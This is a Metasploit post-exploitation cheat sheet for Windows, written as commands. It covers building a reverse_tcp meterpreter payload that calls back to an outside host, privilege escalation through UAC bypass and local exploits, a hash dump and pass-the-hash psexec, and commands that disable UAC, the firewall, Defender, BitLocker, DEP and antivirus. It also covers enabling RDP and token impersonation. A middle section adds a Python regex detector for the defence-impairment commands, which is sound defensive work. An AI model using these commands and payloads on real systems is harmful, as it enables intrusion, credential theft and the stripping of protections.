After obtaining a shell, the next step is to build on the foothold:

  • Privilege escalation
  • Information gathering
  • Pivoting into the internal network
  • Persistent backdoor

Based on an existing session

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
```
(similar to before)

Obtain SYSTEM privileges:

```
load system
getsystem   # will fail
```

Bypass UAC (waits for the user to consent)

```
use exploit/windows/local/ask
  set session
  set filename
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
  set session
  set payload
```

### Escalate directly to SYSTEM via a vulnerability

```
use exploit/windows/local/ms13_053_schlamperei
# the three below do not work very reliably
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec
```

Graphical payload

```
set payload windows/vncinject/reverse_tcp
set viewonly no   # interactive, not view-only
```

User logon

```
load priv
hashdump
# disable UAC
msf > sessions -i 2   # use the session that obtained SYSTEM earlier
meterpreter > shell   # open a shell
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f   # create the value with reg
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f   # UAC is now disabled
C:\Windows\system32>shutdown -r -t 0   # reboot
# attempt exploitation
use exploit/windows/smb/psexec
set RHOST 192.168.1.118
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.119
exploit
```

Disable various protections

```
msf > sessions -i 2   # use the session that obtained SYSTEM earlier
meterpreter > shell   # open a shell
# disable the firewall; requires Administrator or SYSTEM privileges
C:\Windows\system32>netsh advfirewall set allprofiles state on    # on
C:\Windows\system32>netsh advfirewall set allprofiles state off   # off
# stop Windows Defender (windefend)
C:\Windows\system32>net stop windefend
# BitLocker disk encryption, very strong
C:\Windows\system32>manage-bde -off C:
C:\Windows\system32>manage-bde -status C:
# disable DEP
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
# kill antivirus software
C:\Windows\system32>exit
run killav
run post/windows/manage/killav
```
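From the defender's side, the UAC registry edits in the previous section and the firewall, Defender, BitLocker and DEP commands above all leave the same footprint: a process-creation event whose command line contains the exact strings shown. The Python script below is an added example, not part of the original notes; it runs a small rule set (rule names are my own) over a constructed set of sample command lines and flags only the defence-impairing ones, leaving the benign status queries alone.

```python
import re

# Constructed sample process-creation command lines (as seen in Sysmon event 1
# or Security event 4688); not captured from any real host.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f",
    r"netsh advfirewall set allprofiles state off",
    r"net stop windefend",
    r"manage-bde -off C:",
    r"bcdedit.exe /set {current} nx AlwaysOff",
    r"netsh advfirewall set allprofiles state on",  # benign: firewall turned on
    r"reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA",  # benign read
    r"manage-bde -status C:",  # benign status query
]

# Detection rules (names are my own): case-insensitive, tolerant of optional
# .exe suffixes and of a path prefix in front of the executable.
RULES = [
    ("uac_disabled_via_registry",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\Policies\\System\b.*/v\s+EnableLUA\b.*/d\s+0\b", re.I)),
    ("remote_uac_filter_disabled",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\Policies\\System\b.*/v\s+LocalAccountTokenFilterPolicy\b.*/d\s+1\b", re.I)),
    ("firewall_all_profiles_off",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b", re.I)),
    ("defender_service_stopped",
     re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+windefend\b", re.I)),
    ("bitlocker_disabled",
     re.compile(r"\bmanage-bde(?:\.exe)?\s+-off\b", re.I)),
    ("dep_disabled",
     re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*\bnx\s+AlwaysOff\b", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (cmdline, rule_name) pairs for every defence-impairment hit."""
    return [(cmd, name) for cmd in events for name in classify(cmd)]

if __name__ == "__main__":
    for cmd, name in scan(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

On a real estate the same rules would be fed from the process-creation log source rather than the inline list; the registry-based rules are also worth pairing with a periodic check that EnableLUA is still 1 on every host.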

Enable the Remote Desktop service

```
run post/windows/manage/enable_rdp
screenshot    # take a screenshot
use espia
screengrab    # this can also take a screenshot
```

Token

Each time a user logs on, the account is bound to temporary tokens.
When resources are accessed, the tokens are presented for authentication, similar to web cookies.

  • delegate tokens: interactive logon sessions
  • impersonate tokens: non-interactive logon sessions
  • after the account logs off, a delegate token becomes an impersonate token, and its permissions remain valid

Incognito

A standalone tool that msf has integrated into meterpreter.
No password, cracking, or password hash is needed: steal tokens to impersonate another user.
Especially suited to privilege escalation and pivoting across many systems in a domain environment.

```
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token lab\administrator
use exploit/windows/local/ms10_015_kitrap0d
meterpreter > execute -f cmd.exe -i -t   # -t: run the program with the currently impersonated token
meterpreter > shell
```